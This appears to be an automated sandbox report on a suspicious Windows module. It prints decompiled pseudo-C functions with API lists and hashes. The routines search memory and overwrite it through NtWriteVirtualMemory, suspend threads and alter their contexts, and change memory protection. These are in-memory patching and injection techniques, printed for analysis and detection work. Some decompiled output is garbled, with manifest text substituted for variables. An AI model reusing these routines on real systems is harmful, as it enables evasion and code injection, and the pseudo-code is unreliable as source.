                                                                                                                        • Opcode ID: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction ID: 48e3aa18de10c5daafcc2cca0ee42305264480da770c17a9b769614c424a8162
                                                                                                                        • Opcode Fuzzy Hash: 0b83c9daec83d47dc7ebbb295703b958809b84ae84161442182e0d004aec0d1a
                                                                                                                        • Instruction Fuzzy Hash: F7314D72A04B959FE720CF24C955B6B77E9EB84B18F10841DF9968B280D771F804CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F338400, Relevance: 9.1, APIs: 6, Instructions: 90nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 62%
                                                                                                                        			E6F338400() {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v28;
				long _v40;
				void _v44;
				void* _v48;
				intOrPtr _v56;
				long _v80;
				char _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				long _v108;
				intOrPtr _v116;
				intOrPtr _v128;
				long _v132;
				long _t26;
				long _t28;
				long _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t42;
				long _t44;
				union _MEMORY_INFORMATION_CLASS _t47;
				void* _t49;
				intOrPtr _t52;

				_t31 = 0;
				_v80 = 0;
				_t26 = NtQuerySystemInformation(0,  &_v44, 0x2c,  &_v80); // executed
				if(_v28 <= 0) {
					return _t26;
				} else {
					_t52 = _v12;
					_t42 = _v4;
					do {
						_push(0x1c);
						_push( &_v88);
						L6F33C2EE();
						_t47 = 0;
						_v108 = 0;
						_t28 = NtQueryVirtualMemory(0xffffffff, _t31, 0,  &_v96, 0x1c,  &_v108);
						if(_t28 >= 0 && _v128 == 0x1c) {
							_t32 = _v116;
							if(_v100 == 0x1000 && _v96 == 4 && _v92 == 0x20000 && _v104 != _t42) {
								while(1) {
									_t28 = _t47 + _t32;
									__imp__RtlCompareMemory(_t52, _t28, _t42);
									if(_t28 == _t42) {
										break;
									}
									_t47 = _t47 + 1;
									if(_t47 < _v116 - _t42) {
										continue;
									}
									goto L11;
								}
								_t44 = _v40;
								_t49 = _t47 + _t32;
								_v132 = 0;
								_t30 = NtWriteVirtualMemory(0xffffffff, _t49, _v48, _t44,  &_v132); // executed
								_push(_t44);
								_push(_t49);
								_push(0xffffffff);
								L6F33C336();
								return _t30;
							}
							L11:
							_t31 = _t32 + _v104;
						}
					} while (_t31 < _v56);
					return _t28;
				}
			}






























                                                                                                                        0x6f33840f
                                                                                                                        0x6f338413
                                                                                                                        0x6f338417
                                                                                                                        0x6f338420
                                                                                                                        0x6f3384f2
                                                                                                                        0x6f338426
                                                                                                                        0x6f338427
                                                                                                                        0x6f33842c
                                                                                                                        0x6f338431
                                                                                                                        0x6f338431
                                                                                                                        0x6f338437
                                                                                                                        0x6f338438
                                                                                                                        0x6f338449
                                                                                                                        0x6f33844f
                                                                                                                        0x6f338453
                                                                                                                        0x6f33845a
                                                                                                                        0x6f33846b
                                                                                                                        0x6f33846f
                                                                                                                        0x6f338490
                                                                                                                        0x6f338491
                                                                                                                        0x6f338496
                                                                                                                        0x6f33849e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3384a4
                                                                                                                        0x6f3384a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3384a9
                                                                                                                        0x6f3384c1
                                                                                                                        0x6f3384d0
                                                                                                                        0x6f3384d5
                                                                                                                        0x6f3384dd
                                                                                                                        0x6f3384e2
                                                                                                                        0x6f3384e3
                                                                                                                        0x6f3384e4
                                                                                                                        0x6f3384e6
                                                                                                                        0x00000000
                                                                                                                        0x6f3384ed
                                                                                                                        0x6f3384ab
                                                                                                                        0x6f3384ab
                                                                                                                        0x6f3384ab
                                                                                                                        0x6f3384af
                                                                                                                        0x6f3384c0
                                                                                                                        0x6f3384c0

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F338417
                                                                                                                        • RtlZeroMemory.NTDLL(?,0000001C), ref: 6F338438
                                                                                                                        • NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6F338453
                                                                                                                        • RtlCompareMemory.NTDLL(?,00000000,?), ref: 6F338496
                                                                                                                        • NtWriteVirtualMemory.NTDLL ref: 6F3384DD
                                                                                                                        • NtFlushInstructionCache.NTDLL ref: 6F3384E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$QueryVirtual$CacheCompareFlushInformationInstructionSystemWriteZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 145697856-0
                                                                                                                        • Opcode ID: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction ID: 0080b3b2eed9b717a3d3651d1a67a4fb6ea759cc3e924ad000adc7748528338a
                                                                                                                        • Opcode Fuzzy Hash: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction Fuzzy Hash: B02191735083A4AFD210DE55DC80EABBBE9EFC47B4F440B1DF59486180C775E5458B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B270, Relevance: 4.5, APIs: 3, Instructions: 37nativememorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B270(void** _a4) {
				void* _t6;
				void* _t7;
				void** _t13;
				signed int _t17;
				void* _t20;
				void* _t22;

				_t13 = _a4;
				if( *_t13 != 0) {
					_t17 = 0;
					if(_t13[2] <= 0) {
						L7:
						_t7 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						return HeapFree(_t7, 0,  *_t13);
					}
					do {
						_t20 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
						_t22 = _t22 + 0xc;
						if(_t20 != 0) {
							NtResumeThread(_t20, 0); // executed
							NtClose(_t20); // executed
						}
						_t17 = _t17 + 1;
						_t5 =  &(_t13[2]); // 0xc30cc483
					} while (_t17 <  *_t5);
					goto L7;
				}
				return _t6;
			}









                                                                                                                        0x6f33b271
                                                                                                                        0x6f33b278
                                                                                                                        0x6f33b27b
                                                                                                                        0x6f33b280
                                                                                                                        0x6f33b2b0
                                                                                                                        0x6f33b2b2
                                                                                                                        0x00000000
                                                                                                                        0x6f33b2c1
                                                                                                                        0x6f33b283
                                                                                                                        0x6f33b292
                                                                                                                        0x6f33b294
                                                                                                                        0x6f33b299
                                                                                                                        0x6f33b29e
                                                                                                                        0x6f33b2a4
                                                                                                                        0x6f33b2a4
                                                                                                                        0x6f33b2a9
                                                                                                                        0x6f33b2aa
                                                                                                                        0x6f33b2aa
                                                                                                                        0x00000000
                                                                                                                        0x6f33b2af
                                                                                                                        0x6f33b2c3

                                                                                                                        APIs
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,6F33B44C,?,74784970,00000000), ref: 6F33B2BB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33B29E
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B2A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseFreeHeapOpenResume
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3496683721-0
                                                                                                                        • Opcode ID: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction ID: 1110496f906885189f1328f8116ef6c67dc1c1d5a7e4159772a5dde71de7bcf8
                                                                                                                        • Opcode Fuzzy Hash: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction Fuzzy Hash: E9F05E32A41A70AFDB11EA54CC81F5A33A9AB89751F104255F904EF285CB75BC42CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33AFC0, Relevance: 3.1, APIs: 2, Instructions: 71nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33AFC0(signed int __eax, void* _a4, intOrPtr _a8) {
				void* _v0;
				long _v536;
				intOrPtr _v540;
				struct _CONTEXT _v716;
				struct _CONTEXT _v720;
				void* __edi;
				long _t16;
				intOrPtr _t19;
				long _t20;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;
				long _t37;
				signed int _t39;
				void* _t40;
				intOrPtr _t41;

				_t41 = _a8;
				_t39 = __eax;
				_v716 = 0x10001;
				_t16 = NtGetContextThread(_a4,  &_v716); // executed
				if(_t16 < 0) {
					L19:
					return _t16;
				}
				if(_t39 != 0xffffffff) {
					_t16 = _t39 + 1;
				} else {
					_t16 =  *0x6f340958; // 0x0
					_t39 = 0;
				}
				if(_t39 >= _t16) {
					goto L19;
				} else {
					_t27 = _t39 * 0x2c;
					_t37 = _v536;
					_t40 = _t16 - _t39;
					do {
						_t32 =  *0x6f340950; // 0x0
						_t19 = _t41;
						_t30 = _t27 + _t32;
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							if(_t19 == 1) {
								_t20 = 1;
							} else {
								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
							}
						}
						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
							if(_t20 == 0) {
								_t20 = E6F33AF50(_t30, _t37);
							} else {
								_t20 = E6F33AF90(_t30, _t37);
							}
							if(_t20 != 0) {
								_v536 = _t20;
								_t20 = NtSetContextThread(_v0,  &_v720);
								_t37 = _v540;
							}
						}
						_t27 = _t27 + 0x2c;
						_t40 = _t40 - 1;
					} while (_t40 != 0);
					return _t20;
				}
			}



















                                                                                                                        0x6f33afce
                                                                                                                        0x6f33afd6
                                                                                                                        0x6f33afde
                                                                                                                        0x6f33afe6
                                                                                                                        0x6f33afed
                                                                                                                        0x6f33b099
                                                                                                                        0x6f33b099
                                                                                                                        0x6f33b099
                                                                                                                        0x6f33aff6
                                                                                                                        0x6f33b001
                                                                                                                        0x6f33aff8
                                                                                                                        0x6f33aff8
                                                                                                                        0x6f33affd
                                                                                                                        0x6f33affd
                                                                                                                        0x6f33b006
                                                                                                                        0x00000000
                                                                                                                        0x6f33b00c
                                                                                                                        0x6f33b00f
                                                                                                                        0x6f33b015
                                                                                                                        0x6f33b01c
                                                                                                                        0x6f33b020
                                                                                                                        0x6f33b020
                                                                                                                        0x6f33b028
                                                                                                                        0x6f33b02b
                                                                                                                        0x6f33b02e
                                                                                                                        0x6f33b046
                                                                                                                        0x6f33b030
                                                                                                                        0x6f33b031
                                                                                                                        0x6f33b03f
                                                                                                                        0x6f33b033
                                                                                                                        0x6f33b03a
                                                                                                                        0x6f33b03a
                                                                                                                        0x6f33b031
                                                                                                                        0x6f33b053
                                                                                                                        0x6f33b057
                                                                                                                        0x6f33b060
                                                                                                                        0x6f33b059
                                                                                                                        0x6f33b059
                                                                                                                        0x6f33b059
                                                                                                                        0x6f33b067
                                                                                                                        0x6f33b070
                                                                                                                        0x6f33b07d
                                                                                                                        0x6f33b082
                                                                                                                        0x6f33b082
                                                                                                                        0x6f33b067
                                                                                                                        0x6f33b089
                                                                                                                        0x6f33b08c
                                                                                                                        0x6f33b08c
                                                                                                                        0x00000000
                                                                                                                        0x6f33b090

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction ID: 59cad453644579db8a67e217b24814fed65208902995dc2cc9b906cd707c02dc
                                                                                                                        • Opcode Fuzzy Hash: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction Fuzzy Hash: C221EE33A087F54BD720DB68C9807AA77D9EB85350F40062AD4B4CB180D735E94587A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B1F0, Relevance: 3.0, APIs: 2, Instructions: 42nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B1F0(long** __eax, intOrPtr _a4) {
				signed int _v0;
				void* __esi;
				long _t10;
				signed int _t16;
				void* _t21;
				intOrPtr* _t23;
				void* _t24;

				_t23 = __eax;
				 *__eax = 0;
				__eax[1] = 0;
				__eax[2] = 0;
				_t10 = E6F33B0A0(__eax);
				if( *_t23 != 0) {
					_t16 = 0;
					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
						L7:
						return _t10;
					}
					do {
						_t10 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
						_t21 = _t10;
						_t24 = _t24 + 0xc;
						if(_t21 != 0) {
							NtSuspendThread(_t21, 0); // executed
							E6F33AFC0(_v0, _t21, _a4);
							_t24 = _t24 + 8;
							_t10 = NtClose(_t21);
						}
						_t16 = _t16 + 1;
					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
					goto L7;
				}
				return _t10;
			}










                                                                                                                        0x6f33b1f1
                                                                                                                        0x6f33b1f3
                                                                                                                        0x6f33b1f9
                                                                                                                        0x6f33b200
                                                                                                                        0x6f33b207
                                                                                                                        0x6f33b20f
                                                                                                                        0x6f33b212
                                                                                                                        0x6f33b217
                                                                                                                        0x6f33b25f
                                                                                                                        0x00000000
                                                                                                                        0x6f33b25f
                                                                                                                        0x6f33b220
                                                                                                                        0x6f33b22a
                                                                                                                        0x6f33b22f
                                                                                                                        0x6f33b231
                                                                                                                        0x6f33b236
                                                                                                                        0x6f33b23b
                                                                                                                        0x6f33b24a
                                                                                                                        0x6f33b24f
                                                                                                                        0x6f33b253
                                                                                                                        0x6f33b253
                                                                                                                        0x6f33b258
                                                                                                                        0x6f33b259
                                                                                                                        0x00000000
                                                                                                                        0x6f33b25e
                                                                                                                        0x6f33b261

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                          • Part of subcall function 6F33B0A0: HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6F33B16A
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtSuspendThread.NTDLL(00000000,00000000), ref: 6F33B23B
                                                                                                                          • Part of subcall function 6F33AFC0: NtGetContextThread.NTDLL ref: 6F33AFE6
                                                                                                                          • Part of subcall function 6F33AFC0: NtSetContextThread.NTDLL ref: 6F33B07D
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B253
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1213046356-0
                                                                                                                        • Opcode ID: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction ID: 04efed0e7fd23f17494e9e287c7278ae8680cabaab1548e4dac6af3f4c6b1888
                                                                                                                        • Opcode Fuzzy Hash: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction Fuzzy Hash: 7701FF7A9007659BD320CF14E8C0B6BB3E4AF80709F20462DE9958B280D3B57845CA62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B510, Relevance: 3.0, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B510() {
				void* __edi;
				void* _t6;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t17;

				E6F33B460();
				_t17 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
				if(_t17 == 0) {
					_t14 = 2;
					goto L4;
				} else {
					_t14 = E6F33B3A0(0, 0);
					if(_t14 != 0) {
						L4:
						E6F33B4B0();
						return _t14;
					} else {
						E6F33A550();
						_t6 =  *0x6f340950; // 0x0
						_t11 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						HeapFree(_t11, 0, _t6);
						_t12 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						HeapDestroy(_t12); // executed
						"ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 0;
						 *0x6f340950 = 0;
						 *0x6f340954 = 0;
						 *0x6f340958 = 0;
						E6F33B4B0();
						return _t14;
					}
				}
			}









                                                                                                                        0x6f33b512
                                                                                                                        0x6f33b519
                                                                                                                        0x6f33b51f
                                                                                                                        0x6f33b578
                                                                                                                        0x00000000
                                                                                                                        0x6f33b521
                                                                                                                        0x6f33b527
                                                                                                                        0x6f33b52e
                                                                                                                        0x6f33b57d
                                                                                                                        0x6f33b57d
                                                                                                                        0x6f33b586
                                                                                                                        0x6f33b530
                                                                                                                        0x6f33b530
                                                                                                                        0x6f33b535
                                                                                                                        0x6f33b53a
                                                                                                                        0x6f33b543
                                                                                                                        0x6f33b549
                                                                                                                        0x6f33b550
                                                                                                                        0x6f33b556
                                                                                                                        0x6f33b55c
                                                                                                                        0x6f33b562
                                                                                                                        0x6f33b568
                                                                                                                        0x6f33b56e
                                                                                                                        0x6f33b577
                                                                                                                        0x6f33b577
                                                                                                                        0x6f33b52e

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B472
                                                                                                                          • Part of subcall function 6F33B460: Sleep.KERNEL32(00000001,00000001,?,00000001,?,?,?,?,?,6F331FE4,00000000,?,?), ref: 6F33B48B
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B497
                                                                                                                          • Part of subcall function 6F33A550: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,6F33B535), ref: 6F33A57A
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 6F33B543
                                                                                                                        • HeapDestroy.KERNELBASE(00000000), ref: 6F33B550
                                                                                                                          • Part of subcall function 6F33B4B0: InterlockedExchange.KERNEL32(6F340620,00000000), ref: 6F33B4B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$CompareFreeHeap$DestroySleepVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 722554433-0
                                                                                                                        • Opcode ID: 4d03ccb2a8fceb300e0a492fa577b267cb3661af096589466fe62b4cd9b566db
                                                                                                                        • Instruction ID: 92e97a168a39c2040c4d3879760a03b435e06fcb1534dee1769a7c4c5f4515e4
                                                                                                                        • Opcode Fuzzy Hash: 4d03ccb2a8fceb300e0a492fa577b267cb3661af096589466fe62b4cd9b566db
                                                                                                                        • Instruction Fuzzy Hash: 81F062F3F01EA097DA50FB6A944046AB7ACEBE6635B01101EED45C6350CB3C98558751
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33AD39, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33AD39(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				void* _t71;
				long _t97;

				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
				 *__ebx =  *__ebx + _t71;
				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
				_push(__ecx);
				_v4 = _a4;
				_a4 = _a8;
				_t97 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t97 > 0x00000000;
			}






                                                                                                                        0x6f33adab
                                                                                                                        0x6f33adad
                                                                                                                        0x6f33adbf
                                                                                                                        0x6f33addf
                                                                                                                        0x6f33ade0
                                                                                                                        0x6f33adee
                                                                                                                        0x6f33adf7
                                                                                                                        0x6f33ae07
                                                                                                                        0x6f33ae16

                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
